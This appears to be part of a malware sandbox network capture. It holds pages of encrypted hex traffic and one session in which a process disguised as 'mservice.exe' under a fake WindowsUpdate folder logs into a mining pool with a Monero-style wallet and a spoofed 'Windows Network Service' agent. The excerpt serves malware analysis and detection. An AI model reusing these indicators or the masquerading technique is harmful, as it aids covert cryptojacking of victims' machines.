                                                                                                                  2023-08-03 15:59:56 UTC2217INData Raw: 13 de 77 47 7e 31 b7 4b 89 1e d3 ae 91 1b 08 bf 68 38 c4 47 e9 80 1c 52 19 4c 05 11 50 18 c3 35 32 7a 6b a9 ed ae fd ba 43 72 62 cb 50 74 94 c6 72 64 31 55 46 a3 b9 e0 ec 5e a4 11 b2 e6 02 8a f6 13 69 97 7c 3a 78 75 c4 6a c1 b4 67 30 85 69 61 4b ea 64 3b 02 45 44 d4 a8 9a 37 23 61 f2 60 bc ab 22 42 4f 98 6b 22 1e 1a ca 39 e9 b5 6f 1c a4 7d 50 fb 41 7e 25 2c f4 ae 45 be e2 c8 6a 59 b0 d5 b2 7e 1c 03 86 4e 3b 35 03 b0 a2 2a 39 86 c5 d6 5e cb 54 86 11 1e fe d1 39 03 01 47 f9 4d 45 a4 9c 7a 03 ea 63 d2 2f 5c 16 1e 76 21 10 5f 52 55 b7 03 49 1b 56 66 df e6 71 5d 65 3f 36 cd fc cd 73 8d 74 5e 19 e8 92 86 2a d3 c9 43 d9 07 a2 d2 18 97 a9 3b 0a 18 91 ae 68 01 d4 54 93 9e 9a 7a 7a a8 17 bf e3 15 1c ed 37 41 42 9a a1 39 96 ea f9 2c 3f f0 34 a9 fc 56 14 ba 56 70 10
                                                                                                                  Data Ascii: wG~1Kh8GRLP52zkCrbPtrd1UF^i|:xujg0iaKd;ED7#a`"BOk"9o}PA~%,EjY~N;5*9^T9GMEzc/\v!_RUIVfq]e?6st^*C;hTzz7AB9,?4VVp
                                                                                                                  2023-08-03 15:59:56 UTC2233INData Raw: a0 88 8c 9f 45 87 fb 76 92 bb 87 ac ca a5 81 ef 5f 30 1e fc 6c f7 8e a5 d4 45 03 ab fd fb 46 db d0 16 99 44 ba e9 57 08 6b cd bf 17 bb e9 06 78 27 49 47 46 d9 2f a0 3f 0e ca 56 c0 7c cf f4 6e 38 80 26 e3 76 64 db c2 e2 02 27 22 f0 9c b4 3f e8 8f 99 78 dc 6b c2 b7 10 1e c4 6f 2e 7a 9d 82 a7 5a d6 c6 47 35 68 30 57 e7 84 4d c9 c5 27 15 06 b4 20 cd 8a 49 92 7e c8 88 8b b9 71 d8 73 e6 03 09 98 4a 13 ca 7c b0 dd 77 33 52 03 a3 27 b4 c6 b9 1d 0c 92 13 88 0f 46 67 e1 c8 4b b7 61 c4 a3 de 69 7a fb ea 06 90 52 9e de ae 07 d9 00 b5 f2 16 9c dd c0 e0 18 55 cb c9 60 8e 82 22 53 33 04 e4 8e ea e4 a2 70 c8 fd 89 87 e0 c1 83 01 90 ab 1b 63 4c d1 32 f2 e9 a9 ff 64 84 86 16 11 f4 a5 5a 83 ba 48 c0 c0 1d 53 93 bc 68 73 96 97 ae 5f 34 5e 2a 17 87 d5 05 ca bf d8 a9 62 30 07
                                                                                                                  Data Ascii: Ev_0lEFDWkx'IGF/?V|n8&vd'"?xko.zZG5h0WM' I~qsJ|w3R'FgKaizRU`"S3pcL2dZHShs_4^*b0
                                                                                                                  2023-08-03 15:59:56 UTC2249INData Raw: 17 06 33 dd 59 18 de 68 23 f9 86 5d e2 4c 8e b0 39 13 04 8a c8 5e 39 61 b3 20 6d 9f 1c c6 84 1d a2 fe 28 9d e3 52 d8 06 af cc 8a ed 0f c6 ae c3 6b f4 dd 98 0b 99 07 74 6d 99 58 b2 55 76 d8 6c bf 85 c1 dc 95 ca 87 98 ac 34 b9 be aa 99 05 e4 13 5b d7 a6 42 00 d2 05 db 60 36 61 d3 28 05 b6 3b b9 13 cb 84 92 e1 5d 65 92 82 f4 0e aa 7e 39 72 af 57 4c 81 3c b3 5e bd 87 8d e7 0c f8 75 05 c4 55 8f 91 68 8f ec 3d a6 7d b3 31 1d fa d7 a0 c2 b5 f8 27 69 6c 79 e1 ca 80 b9 90 2e 07 6e ef f9 93 aa 46 80 e3 17 91 1d cb 92 03 c0 90 3d 78 77 e6 a3 7d 95 7b ac 7d ac bd 93 e2 b6 81 3e de 13 2b db 05 1e 9d a2 3b e4 66 26 51 20 cc 8a 58 d2 26 f2 d2 85 ca 4b 8e 2d 07 4d d1 35 34 dd 12 76 14 63 e6 47 64 15 5e e2 75 4b 96 71 f4 0a 94 d4 1d e0 61 15 bd f4 4d 24 4b 4e d0 20 7a a3
                                                                                                                  Data Ascii: 3Yh#]L9^9a m(RktmXUvl4[B`6a(;]e~9rWL<^uUh=}1'ily.nF=xw}{}>+;f&Q X&K-M54vcGd^uKqaM$KN z
                                                                                                                  2023-08-03 15:59:56 UTC2265INData Raw: 47 25 10 54 b9 2a b0 1f b7 8d 1b 1d 17 39 23 a1 29 66 32 2b 47 33 11 f6 76 cb ce 4e e7 dd 28 90 15 f0 9b f8 d4 55 52 f7 a9 92 bc 94 c9 0e 0b 8a d4 22 b0 2b 7c 7a 42 2b 8e 01 bf 07 77 7f 21 52 73 20 01 da 73 17 cc 52 71 b7 de 16 5e cc f8 cb a0 29 69 12 e7 80 d4 2e fb a2 a2 47 60 aa 53 56 88 99 3b 59 dc db 35 25 6a d4 59 60 c8 f0 87 48 de 00 e2 f9 14 bf b7 da b1 3f 03 0c 79 f3 8b 71 fe 82 47 d5 21 4f 49 e9 ff 40 43 a5 ba e8 aa 24 41 7f c3 ed ab 55 81 aa 90 94 f3 ac 45 3f 17 8e 36 a2 d8 1e c5 ec c6 c3 56 26 3a 9c f5 78 bd 5a 02 94 8f 0b c3 c8 81 df dd e8 3d b9 4b a3 d4 82 6c aa 5e 1b 7a 89 15 23 a1 74 c1 ff 70 5e 5a db 89 9a a5 d3 7d 15 79 09 ef cd f0 ae 73 c1 52 fb da 52 4f 8e 5f f9 5f ef 93 08 f0 99 16 a6 59 5c 27 2f 49 75 85 7e ea 56 5b 49 9b e0 a0 0b 23
                                                                                                                  Data Ascii: G%T*9#)f2+G3vN(UR"+|zB+w!Rs sRq^)i.G`SV;Y5%jY`H?yqG!OI@C$AUE?6V&:xZ=Kl^z#tp^Z}ysRRO__Y\'/Iu~V[I#
                                                                                                                  2023-08-03 15:59:56 UTC2281INData Raw: f2 80 c5 a7 64 7c 09 1b df ef 07 3b cf 2d 70 77 25 72 21 8f 14 c6 e4 47 a7 00 e1 48 05 6e 72 ae 27 3b 73 8f ba 68 95 9d e2 8a 9a fe e0 4c fe c3 78 19 be d8 21 2e f8 2c 76 aa 2b bd c0 9a 98 4a 84 57 67 83 c0 d2 bb 9e 6f f7 3a 8d 0c b1 7e 63 5e ec 35 3f 81 55 3f 37 f4 13 83 2a 62 23 5d 30 45 cd 14 c2 02 7b 1f fe 69 51 02 0f 89 84 5f b6 53 1a 43 c0 f1 14 df c8 72 ea 3b 08 c0 0a aa aa 68 d7 60 45 29 44 bb a4 44 80 18 ff b4 be d2 03 cf c3 fc 44 f8 94 3e 0c c5 9a 1a df 8a 27 43 5c fd 3a cb 08 52 9c 7c f3 48 64 77 79 cd 57 91 f2 d4 4a b6 27 4c 1d 9e f7 70 5f 0e ff 9d c5 cf 72 7b d9 91 cb 6f 68 fa 86 28 b4 4b 0e 0f 8b 5c d7 a1 f3 59 4f 15 19 54 92 ec 4b b1 fd 87 ee 9a 91 e7 7a 14 26 6b 4a ca a0 65 08 72 a5 d3 9e d4 83 29 eb 82 e5 ca 76 9c 4a 52 4d b2 32 4b 2b d4
                                                                                                                  Data Ascii: d|;-pw%r!GHnr';shLx!.,v+JWgo:~c^5?U?7*b#]0E{iQ_SCr;h`E)DDD>'C\:R|HdwyWJ'Lp_r{oh(K\YOTKz&kJer)vJRM2K+
                                                                                                                  2023-08-03 15:59:56 UTC2297INData Raw: 00 a5 ca 7a ac 92 bf 1a 7a 6b e9 6c 9f 1a 89 14 a0 13 82 4a 8b 50 b2 84 0e 85 bb b8 b4 eb ed 6b 95 a6 7d 8d fe 54 2e 34 8e 3a a8 27 da 84 6b 16 03 98 59 8a 3f 6d 17 4b 13 9f f7 ac 6a e6 6f ab 80 a7 86 eb e9 b0 e1 5d f3 ab bb 39 dc 9c d2 82 55 40 0f 27 1e 97 9c a0 b1 f2 44 19 9f 48 46 e6 45 79 32 3d 2f 2f b0 38 27 0a d0 8b 12 cd c1 3c 9a 23 33 4e 9d 63 fa d8 3c 11 b4 a9 29 fb 67 9f bc 2b 8f 30 1f ea 2e a3 6d 52 7e 61 cd 74 4a af 78 a5 71 37 f7 c8 ee 94 d9 fa ac 4e c7 13 1c 88 45 04 36 21 53 6e 36 09 e6 48 38 a2 dd 2c 9b 33 c2 67 a3 c3 08 94 65 0a 0e 7f c0 d1 d1 bd 6d 59 bc ad ca 82 05 4d 32 99 97 16 7c c5 ca dc ac c5 5a ba 5f 58 ed db 96 5c df b2 2b 4d cf ec 13 e6 f6 1b 73 63 7d 8b 2c 35 a1 bb 4e 61 b8 81 45 b5 d5 73 37 73 a2 e7 8f c9 28 27 95 ea 35 21 4b
                                                                                                                  Data Ascii: zzklJPk}T.4:'kY?mKjo]9U@'DHFEy2=//8'<#3Nc<)g+0.mR~atJxq7NE6!Sn6H8,3gemYM2|Z_X\+Msc},5NaEs7s('5!K
                                                                                                                  2023-08-03 15:59:56 UTC2313INData Raw: f0 c3 93 23 e7 08 ff 86 3e e6 16 1b 2c a4 e3 bd 17 79 29 4f 86 6f e1 2f 64 aa 8e 9d d0 31 cb 81 8c 9b 6e 40 7a 3c c1 a3 f6 9b 6f 1b f3 52 cb 35 cf 34 27 9b a0 78 e5 47 04 69 19 76 02 0b b9 33 a0 7e 0c 0f a2 23 e2 7a f5 6a bf 8c d6 d8 cc ef 83 7c 3b a8 8c e7 93 1f bf 62 dd c5 58 4a d4 5f 8e 93 6a 5e f8 87 7e 2d e7 8d cb c7 0c 57 e8 06 3a 8c 91 25 7a f4 13 f6 61 97 89 57 94 4e b1 fa 05 63 0c 93 49 9f 0a 0a 8f 86 70 58 ab 05 67 6a 45 0c d2 e4 4f 77 0a b8 8c a8 e8 07 5e fa 1d 9b b6 2f a9 67 d7 32 c8 89 1b 15 75 b8 78 96 39 96 e0 a7 78 f9 86 20 10 11 bb 1d db 97 6f d0 52 14 28 87 df 31 c5 d4 b6 4f cd 8d 56 6b db dc 6c fd 7f 88 fd 11 7d 8a aa 5a 5f b0 0d 2f 02 34 80 b4 3e 38 e5 6b ff 80 91 08 de 98 b9 f2 47 6a fe 64 92 d7 57 77 af 65 02 b3 3e 1f 01 97 29 df b4
                                                                                                                  Data Ascii: #>,y)Oo/d1n@z<oR54'xGiv3~#zj|;bXJ_j^~-W:%zaWNcIpXgjEOw^/g2ux9x oR(1OVkl}Z_/4>8kGjdWwe>)
                                                                                                                  2023-08-03 15:59:56 UTC2329INData Raw: 3f 0d 5f 41 5a dc e7 6e f4 69 35 0c ce b7 17 b4 53 22 7c a2 ad 98 6f 7f 70 e8 85 c4 1b dc bf 99 1f 5a 10 f4 90 52 b2 fd 39 2f d3 12 18 94 cd c4 e2 8f 90 80 d8 b3 bf 2d a5 f6 db 44 dc 45 1f 50 58 8c fb 16 4e 9a 05 28 7d 83 22 87 ce 58 93 d1 f0 53 ad 8c 53 ff fe 25 1d 16 e2 c5 e8 9f 2b 08 3b 5b 30 e5 37 ae 59 4e 70 43 a4 8a f1 bd d2 ce a8 3d 36 be b2 5b 22 35 3a 04 1a 3e b4 03 bf 41 83 3d a4 a7 82 98 f5 15 ea 0d 1a 43 80 53 08 13 66 7e f0 d9 83 d9 04 20 bf 31 1e d0 cd fa 90 aa b7 47 7e e4 60 43 b8 a8 f7 20 b6 a5 50 9d 2d e7 a0 de 3b 9c 7d 3f 7e a6 16 46 33 1c 81 30 54 81 b9 a7 3a d3 93 5e fd cc a1 08 73 1e f6 ae 71 5b 2a 6a e9 c3 53 0d 1a 44 5e e3 1b e6 3d 06 06 9d 35 4a 14 69 6e 56 82 f3 7a e8 5e 32 d7 22 11 e4 59 10 ec 32 24 f1 b1 93 2a 88 c0 c6 81 a2 19
                                                                                                                  Data Ascii: ?_AZni5S"|opZR9/-DEPXN(}"XSS%+;[07YNpC=6["5:>A=CSf~ 1G~`C P-;}?~F30T:^sq[*jSD^=5JinVz^2"Y2$*
                                                                                                                  2023-08-03 15:59:56 UTC2345INData Raw: 05 1b 73 13 2c 76 c1 5c 28 69 a0 3f 07 8d c1 c4 2e 40 51 fe 83 08 1b 35 04 ed 79 c5 ed c9 60 bf 22 70 db 41 90 98 a2 16 c3 98 ed 46 1b 50 e2 87 68 ab c8 7b 1e 3f 83 8f 7f 74 a7 43 3b e9 05 a1 6b 70 83 b9 7a 05 76 79 5c 39 75 4b 49 37 20 5c f2 e8 9f 69 af c4 0a 51 c8 9a 40 1f a1 1e 0b 56 06 52 d7 2b ab a9 de 9e 11 c0 16 56 bc 41 ff 31 e6 5f 5e 2c e8 49 2a a9 01 90 17 d5 28 8d 03 34 f5 74 e0 65 10 30 94 b0 d3 02 88 94 4a b9 98 32 4b eb c8 66 22 6a 42 cd 35 fe b9 f9 7c 40 29 e5 9d 24 6e 8d 66 be 07 a7 44 5e 17 bc 15 67 b5 97 ae 2b 3a fa 47 59 a6 4d 6e 2d 0b 74 2f 92 e3 2c c5 7c 3c e6 3b 34 13 e1 3d 2f a6 d1 d6 52 7e 49 ba 8b 15 9f 4f 30 21 33 b2 98 9d c7 ba d0 a6 aa ef 9e 9d 22 de 2b 9c e2 71 ef 06 d8 61 27 a4 d4 e9 a3 a4 4c 40 7c 79 1b 01 18 6e 7c bf 46 a5
                                                                                                                  Data Ascii: s,v\(i?.@Q5y`"pAFPh{?tC;kpzvy\9uKI7 \iQ@VR+VA1_^,I*(4te0J2Kf"jB5|@)$nfD^g+:GYMn-t/,|<;4=/R~IO0!3"+qa'L@|yn|F
                                                                                                                  2023-08-03 15:59:56 UTC2361INData Raw: 1d 65 88 1d 57 87 43 1d 64 e9 c8 d2 cf 2a 6a 42 af 9b 07 54 7f 9d 60 c5 b7 5a eb cf df 49 f0 43 4a 3f 06 1f d3 52 f4 4e 78 72 72 68 b2 7c 66 64 ae d5 27 e6 66 2d f1 d9 96 ff 74 6a ec ca 1b 9a e6 ad 97 6d e2 8b 91 d9 fa d7 84 54 c4 15 72 30 62 6c 58 46 f7 d2 a9 fb 13 c3 bb 87 3e 1b 3b 16 65 8e 78 64 3a 41 54 6b 42 4c 7f 33 9e 5f 65 03 d7 6c 50 38 60 27 3c 15 9d c2 64 1e 9e a7 ee e6 73 3e 11 88 b3 87 43 82 9f 01 c6 e0 f9 46 a5 c5 90 0e 76 a9 94 0a 86 2e 16 ff 8d 9e 26 e1 00 1a 1b cb a3 3a 4f ad 93 ea c9 e0 68 e9 c7 8a 7c f9 15 25 98 4c c3 00 ce 93 b2 19 34 8a c1 a9 3c 9b ce 11 cb 02 f1 a5 7f 3a 13 16 51 dd a4 63 7e ab 18 72 27 00 c6 dd ef 34 2e 27 b7 46 06 c1 0f 20 89 fe 13 a0 a9 9d 03 61 a2 5d 3f 23 1f e5 be 09 1d ef 9f 35 6b 98 ef 8a db e3 28 75 e4 33 90
                                                                                                                  Data Ascii: eWCd*jBT`ZICJ?RNxrrh|fd'f-tjmTr0blXF>;exd:ATkBL3_elP8`'<ds>CFv.&:Oh|%L4<:Qc~r'4.'F a]?#5k(u3
                                                                                                                  2023-08-03 15:59:56 UTC2377INData Raw: 32 3a 5c e2 91 a6 1e 7e d8 a1 4d 63 83 68 e5 d1 fc 1a 92 1d de 62 03 a8 18 52 24 b6 2f e5 8b 3f d5 d5 70 99 cf 9c c1 27 7b bf 89 b2 86 9f 63 e3 f5 47 1a 3b da 0b 35 b6 73 67 55 96 95 dc 56 0f 8c 34 b1 17 6d 6e 56 74 a5 69 29 2a a4 10 91 b8 bf 76 59 ef cb d4 98 a2 29 af 8b c7 df 4f 6b 35 80 2e 18 95 4e 94 da 93 0f 19 7f 3b 11 b2 ca 14 1e a7 9a a5 d1 be 7a 44 74 73 a1 f2 b0 0b 9f ed 2d b9 40 22 c8 f8 7c 0d f9 91 5c 2a c8 3e f9 f0 4e 91 5d 07 e1 66 52 4b 8e 90 0c 7a fd ae 81 b8 7b cb a9 c8 3f c4 4e ce 9a 7b 9d 6c 56 f3 dc da f8 ad 3c 13 58 07 2e 12 d6 fc d2 57 b1 81 62 02 76 14 6e 2d 8d fa 3d 9a eb 57 84 f5 18 8a 9f cb 47 b0 a5 ca c3 99 fc 3c e2 a0 5b b9 97 58 f5 0c 42 e5 94 b9 11 6a c3 bd 38 8a 08 99 b8 1e 26 d7 a2 9a be 28 32 09 b8 ad 63 2d f6 ac 61 ef 04
                                                                                                                  Data Ascii: 2:\~MchbR$/?p'{cG;5sgUV4mnVti)*vY)Ok5.N;zDts-@"|\*>N]fRKz{?N{lV<X.Wbvn-=WG<[XBj8&(2c-a
                                                                                                                  2023-08-03 15:59:56 UTC2393INData Raw: 4b 0e 67 37 c4 f5 ca b0 2e 57 87 c3 c7 f8 ea 77 22 fa 14 62 45 76 d0 77 c3 c3 9c c7 aa 6b 5b 5c 95 d8 c8 40 96 10 ac 1d 99 5b 1d 44 9a e0 b9 7e da f7 78 71 57 59 69 5e d5 7c 17 93 68 9b 04 7f c6 19 85 42 19 22 6c ae 44 ed 62 15 b5 a3 80 78 f3 bd 55 f9 e5 68 a0 23 06 1f d8 32 83 1b 66 8d cf 61 54 3b 7b 8b 6a 26 05 f6 d4 39 6b 79 ef 4c 0b 29 86 36 d7 d2 07 b6 34 e2 b6 81 5e cc 68 11 39 d2 96 72 27 28 58 46 bb b8 9f 8e f1 3a 6b e1 1b f9 a5 9a 79 03 03 e7 c1 74 e1 cc 69 de 4b 98 12 50 e1 11 e8 d0 dd 41 7a 17 68 84 22 e1 84 59 86 dc a9 2b cc d4 27 68 64 34 c4 de c1 82 04 49 c7 90 0c df d7 06 56 3c e6 44 bf 00 f1 00 e7 5f c7 de c2 df 7b d4 8e 5c e6 fe 2e ef 09 e9 5c 13 be 11 6c 32 f6 b3 b4 6a 08 4a 19 cf 7e 47 06 3c f1 e6 5d 44 20 ff b5 8a 32 55 71 5e f9 18 1b
                                                                                                                  Data Ascii: Kg7.Ww"bEvwk[\@[D~xqWYi^|hB"lDbxUh#2faT;{j&9kyL)64^h9r'(XF:kytiKPAzh"Y+'hd4IV<D_{\.\l2jJ~G<]D 2Uq^
                                                                                                                  2023-08-03 15:59:56 UTC2409INData Raw: c9 a2 04 cf 6d 69 f2 b3 9c a0 16 aa e2 b2 37 cb f1 19 c3 51 3e cc 95 20 6b a5 f2 87 0a ab 21 38 58 3f 73 76 92 2e d1 cd 5a f6 9d b0 bd 21 6e 6c f6 8b b2 7e 93 49 97 e3 dc 97 0b ec 51 51 4a 8f 39 42 78 ef 9b f4 b3 ed 33 a0 7f b7 4e d1 16 d6 b6 3e 8b 5f cd 95 47 79 8b db ce 09 18 40 4f 68 b7 57 84 cc 61 d4 91 90 e5 86 71 30 03 4f 58 18 60 97 fe 23 fc 32 6e 30 03 11 be bb 35 b1 a3 bc 18 d5 d5 09 f9 88 fe dd e2 f6 54 21 09 62 06 f3 40 6b 07 45 7d 5b ca 1e 3b 56 24 92 34 26 18 36 6f 90 28 45 77 1c 18 3a fa 11 b0 1e 87 a2 25 cd 8d 28 76 2b 8b cd bc 9c de 9f 34 75 87 9a d6 96 30 f6 59 7a 64 b0 3d 2e c5 79 24 75 26 2e d8 fa 23 a2 a9 6a fd 36 98 9c b7 30 f7 e5 17 4c 0b 65 6b 5e 00 83 ed 84 5a 51 6a 9e 0f 95 9d 40 f5 a8 06 23 01 8f 2d 9e a9 af ce 1f 01 30 fe b5 33
                                                                                                                  Data Ascii: mi7Q> k!8X?sv.Z!nl~IQQJ9Bx3N>_Gy@OhWaq0OX`#2n05T!b@kE}[;V$4&6o(Ew:%(v+4u0Yzd=.y$u&.#j60Lek^ZQj@#-03
                                                                                                                  2023-08-03 15:59:56 UTC2425INData Raw: 96 b6 f8 23 3f 2c 4a ca 83 18 78 f2 9e 67 ce 0d f0 4b 0f a1 cf 01 54 ea ec d5 71 e5 25 5f 8e e5 2b 61 89 9d ee 94 26 8a 26 30 e3 b9 a0 af 6a 12 9d c9 a6 e1 5a 9a e3 b1 e5 07 10 04 e2 91 84 a3 8d 07 62 a5 ba 42 39 ec eb 4d 5c fc ac 13 46 48 7b 72 d4 e9 08 06 05 b6 22 98 0e dc 6f 95 38 16 3c eb 8f 79 72 ba 72 a7 92 bb 1f 1a 52 c1 f9 f9 86 ea 57 f8 71 9a a6 91 cf 34 2d 0d a2 3a 24 e0 22 c0 30 32 1d 28 10 46 c4 9b 98 a2 17 aa 6b e3 dd 28 85 5a 28 9b 4a f0 24 48 b6 ad 0b 0c 92 4f 89 a9 db 32 d2 01 b6 b7 dd 7f 82 dd df 81 c3 e3 b9 bd 8e 61 5d c7 cb 9f 53 ef d9 68 54 2e e7 1c 06 3d f4 f1 8d 17 77 c4 16 c6 fc f0 cc 36 a3 c8 06 61 89 6c 86 ba cf 46 1f ba 70 78 83 30 62 66 f8 08 9a 35 52 63 a5 8f 3e d4 c4 b9 9b 3f ab ad 14 a9 71 04 d2 0c b8 a7 fb f2 13 ed 0e 7b 5f
                                                                                                                  Data Ascii: #?,JxgKTq%_+a&&0jZbB9M\FH{r"o8<yrrRWq4-:$"02(Fk(Z(J$HO2a]ShT.=w6alFpx0bf5Rc>?q{_
                                                                                                                  2023-08-03 15:59:56 UTC2441INData Raw: ca 5c 3b ce 73 2f 36 3e 1d 5c 84 52 02 fa b9 b6 2c 2e a6 23 d7 2b 60 80 7e ea ad 4e b6 21 a6 7f 88 bd 72 82 e3 a8 ab 06 1d 96 ec 00 61 47 c8 83 be b3 46 55 38 22 d6 0d 18 be 62 fb 4e c8 b2 3e cb 3c 1b 6d f4 44 10 69 d5 3d 8a ef fe 4c c8 ce 2a 0f 7d 50 d0 50 9b 57 d5 ee 9b 52 4b 8e 19 3d 63 a8 4e ff 90 a3 44 69 f5 a5 44 59 5e e9 a5 3b 0f ee 33 67 80 f1 85 33 7c 02 ce 8f 26 04 96 cf e9 17 3f f7 47 7e 67 cd eb 56 08 ee 6a da 83 07 a6 56 3f df 8b 4d 25 4b f4 02 eb 1c eb 88 82 3d 56 70 0b 8a 68 73 f9 97 19 10 4b 9e 0e 55 58 26 17 50 bd 18 09 45 cd b5 48 b2 39 5e 89 0b 05 75 d7 3d a0 0c 4f 30 5a 07 3b ae 3f 9b 77 17 b6 4b d3 c6 55 0e 72 1c 39 cc 13 90 74 c3 22 c4 0d 98 b8 ef 02 1e fb 9d 42 aa 3f b5 84 52 1d 30 33 90 74 bd dc 12 29 b1 7c a6 8d 45 dd d8 50 a9 ee
                                                                                                                  Data Ascii: \;s/6>\R,.#+`~N!raGFU8"bN><mDi=L*}PPWRK=cNDiDY^;3g3|&?G~gVjV?M%K=VphsKUX&PEH9^u=O0Z;?wKUr9t"B?R03t)|EP
                                                                                                                  2023-08-03 15:59:56 UTC2457INData Raw: 33 42 6d b4 80 1f a3 65 20 21 1e f7 a5 77 d0 72 4f b0 e6 c1 78 93 22 21 ce be 79 eb 57 f6 6f 0b 48 6b 9c 87 9b 57 b4 34 48 17 ae 12 c9 a4 f1 5a ee 7a d0 72 6a 8b 32 42 c8 88 ef 4f a3 ee 7d 28 8b ad 18 df c5 7f 4d 14 21 87 6f df 54 98 81 51 78 77 6f 49 ee a3 88 47 a7 d2 05 15 3a 7a ad da 53 01 45 20 33 de fa 86 ca ea 44 b3 44 05 ab 98 66 e5 9f 89 7a e4 18 cd 72 5b 1b f9 59 c9 6a ee 4e 73 12 4d ae 44 78 ce c2 a8 86 aa c4 1c 12 2c 04 fd f3 1e a2 1a d9 f1 34 ca 00 be 75 90 a5 f4 1b 19 11 16 87 c1 16 a0 3b d2 dd d4 e8 95 5f d8 7b 2c b3 f2 43 55 1e c3 01 1b e9 cb 05 92 97 54 65 82 ea b5 db b2 d3 72 be b7 bb d6 5a e6 da 57 43 e3 ff 07 c0 1c 78 f8 ce 64 c2 39 4c f3 f5 49 62 19 95 1e 4c f5 d6 bf 82 18 f6 07 ce da 75 e2 85 ea 34 99 26 e0 b0 09 39 57 66 3f db ec 42
                                                                                                                  Data Ascii: 3Bme !wrOx"!yWoHkW4HZzrj2BO}(M!oTQxwoIG:zSE 3DDfzr[YjNsMDx,4u;_{,CUTerZWCxd9LIbLu4&9Wf?B
                                                                                                                  2023-08-03 15:59:56 UTC2473INData Raw: 1e b8 4b 9a 34 58 ce 9c 91 e7 2a 7b 7e eb 52 b4 2e 52 71 5e d3 45 42 31 e2 1d bc d9 26 35 a6 1e e8 a9 e7 a1 7d eb 1b 7a 52 52 1d a3 db c7 84 b2 e2 22 cf 6b 71 64 f5 d0 6a 16 8e 63 e1 09 56 2f 61 09 14 37 f9 4c 33 eb f5 9b e5 8b 9e b9 1b b3 b6 f7 ec 2f 11 5e df 12 31 f8 2c fb f5 89 3a 00 48 6b 4d c4 a4 b3 7b ac 70 05 23 f4 c6 c2 02 d4 ca ec ca e4 aa 19 36 d3 6a 6a 93 68 ab a2 b3 be 9d 2b 6c 9b a2 b6 85 38 50 8e 10 d8 04 bd eb 2c d2 23 9c b3 38 34 b9 6b 12 6a b9 29 99 63 91 3c a5 6f d9 49 04 0e d8 61 e8 dc 7b 55 75 23 f7 28 0d f3 4b 52 13 d9 25 42 69 0c f4 a0 f8 f6 0d 9d aa 79 eb 3e 50 5a fa d9 8c be c3 3b 62 52 e9 16 fd f5 d6 51 2d da a5 7e 23 97 06 5f ce 90 00 07 cf f4 29 35 5f ed fa 98 da b0 f5 08 54 64 37 19 01 2c 94 a0 0b a3 59 ad 7d c3 07 06 35 f5 76
                                                                                                                  Data Ascii: K4X*{~R.Rq^EB1&5}zRR"kqdjcV/a7L3/^1,:HkM{p#6jjh+l8P,#84kj)c<oIa{Uu#(KR%Biy>PZ;bRQ-~#_)5_Td7,Y}5v
                                                                                                                  2023-08-03 15:59:56 UTC2489INData Raw: 24 06 f1 07 01 12 53 0f d2 81 25 b9 65 e0 96 b8 e1 97 f1 0c f3 58 23 e2 23 03 01 01 05 5d 00 10 00 00 01 00 0c 81 b8 82 6e 0a 01 93 4c 22 1b 00 00
                                                                                                                  Data Ascii: $S%eX##]nL"


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  2192.168.2.749701141.94.96.144443C:\Users\Public\WindowsUpdate\mservice.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  2023-08-03 16:00:23 UTC2489OUTData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 32 69 35 70 4e 5a 6d 37 63 76 58 43 37 37 6e 48 7a 76 7a 68 52 65 41 66 61 56 62 4a 58 34 47 56 58 59 76 65 61 38 68 4b 68 55 58 48 55 5a 48 51 46 44 78 77 46 4a 4d 43 63 5a 7a 39 35 39 77 38 4b 45 4c 76 38 66 46 67 6b 36 44 4b 45 78 51 51 39 55 48 41 78 41 75 43 4a 35 61 62 62 75 22 2c 22 70 61 73 73 22 3a 22 30 33 30 38 2d 31 38 68 30 30 6d 22 2c 22 61 67 65 6e 74 22 3a 22 57 69 6e 64 6f 77 73 20 4e 65 74 77 6f 72 6b 20 53 65 72 76 69 63 65 2f 31 2e 31 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 6c 69 62 75 76 2f 31 2e
                                                                                                                  Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8hKhUXHUZHQFDxwFJMCcZz959w8KELv8fFgk6DKExQQ9UHAxAuCJ5abbu","pass":"0308-18h00m","agent":"Windows Network Service/1.1.0 (Windows NT 10.0; Win64; x64) libuv/1.
                                                                                                                  2023-08-03 16:00:23 UTC2490INData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 62 35 30 37 32 30 35 62 2d 37 35 66 37 2d 34 39 66 36 2d 62 32 31 61 2d 30 35 35 63 64 34 66 39 34 36 65 33 22 2c 22 6a 6f 62 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 38 62 39 65 61 66 61 36 30 36 33 33 66 39 31 66 66 63 63 62 36 64 33 66 62 62 32 36 65 30 33 33 63 32 64 62 64 35 30 66 62 36 63 32 32 62 62 38 31 36 65 32 36 35 30 39 39 61 65 34 34 31 38 35 30 66 36 39 37 31 36 34 65 30 30 30 30 30 30 30 30 30 62 66 36 31 32 62 32 61 64 65 38 33 33 32 37 35 64 30 37 62 33 35 39 66 34 37 30 66 39 63 62 34 39 30 39 66 66 39 61 34 39 38 61 61 34 35 62 34 32 38 33 37 63 38 35 66 63 63 32 64 31 65 31
                                                                                                                  Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"b507205b-75f7-49f6-b21a-055cd4f946e3","job":{"blob":"10108b9eafa60633f91ffccb6d3fbb26e033c2dbd50fb6c22bb816e265099ae441850f697164e000000000bf612b2ade833275d07b359f470f9cb4909ff9a498aa45b42837c85fcc2d1e1
